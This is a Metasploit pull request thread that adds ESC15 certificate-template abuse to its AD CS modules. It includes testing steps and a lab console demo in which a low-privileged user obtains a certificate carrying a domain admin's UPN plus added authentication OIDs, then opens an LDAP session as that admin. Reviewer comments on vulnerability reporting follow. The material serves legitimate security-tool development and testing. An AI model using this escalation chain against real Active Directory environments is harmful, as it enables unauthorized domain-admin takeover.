Add Support for ESC15

[zeroSteiner]

This adds support for ESC15 to various AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15 (downgrading the schema may not work and should be tested, but creating a net-new one does work). Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. Finally, OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Todo

• Test the issued certificate authenticates as the user who specified
• Update the workflow docs for exploiting ESC15
• Update the icpr_cert docs for the new option
• Check on and write missing tests as necessary

Demo

Not sure why the session is showing up as from 127.0.0.1 to 127.0.0.1, but with the new ldap whoami changes, it shows that the certificate authenticated as the MSFLAB\smcintyre DA user and not the MSFLAB\mhatter normal user who issued it.

msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.4.1.311.20.2.2;1.3.6.1.5.5.7.3.2  no        Add certificate application policy OIDs
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID                                                        no        Alternative object SID
   ALT_UPN              [email protected]                    no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA                              yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test                                yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
[*] 192.168.159.10:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
[*] The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/ldap/ldap_login) > run RHOSTS=192.168.159.10 LDAP::Auth=schannel SSL=true LDAP::CertFile=/home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx

[+] Success: 'Cert File /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx'
[*] LDAP session 2 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-09 15:35:50 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -i -1
[*] Starting interaction with 2...

LDAP (192.168.159.10) > getuid
[*] Server username: MSFLAB\smcintyre
LDAP (192.168.159.10) >

Testing Steps

• Use the ad_cs_cert_template to create a vulnerable certificate using the new template
  • Use the same module to read the certificate template to see that the schema is 1 and that the Client Authentication EKU is missing
• Use the ldap_esc_vulnerable_cert_finder module to identify the new template
• Use the icpr_cert module to issue a certificate
  • Use the new option to specify an EKU to add of 1.3.6.1.5.5.7.3.2 (Client Authentication)
  • Use the ALT_UPN option to specify a privileged user
  • When the certificate is issued, see the EKU that was specified listed as a certificate policy
• Use the ldap_login module to authenticate using schannel to the server with the certificate
• Run the getuid command on the session and see that it is authenticated as the user specified in the ALT_UPN datastore argument when the cert was issued

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[adfoster-r7]

Would you be able to throw in a quick report_vuln here for the new vuln? 🤞

Or I'm also happy to wait for Christophe to pick up the report_vuln calls in one batch/PR if that's easier 💯

[cdelafuente-r7]

Thanks! I haven't tested it yet, but it looks good to me.

Regarding the report_vuln, is it something we could simply add to #print_vulnerable_cert_info? It looks like the @vuln_certificate_details data structure already has all the informaiton.

[zeroSteiner]

Alright with the latest commit in place, I'm reporting all of the vulnerabilities that the module is capable of finding.

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns --info

Vulnerabilities
===============

Timestamp                Host            Name                References                                                    Information
---------                ----            ----                ----------                                                    -----------
2024-10-10 13:23:44 UTC  192.168.159.10  ESC1 - ESC1-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs permit authentication
2024-10-10 13:23:44 UTC  192.168.159.10  ESC2 - ESC2-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
2024-10-10 13:23:44 UTC  192.168.159.10  ESC15 - ESC15-Test  https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema
                                                                                                                           -Version)

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >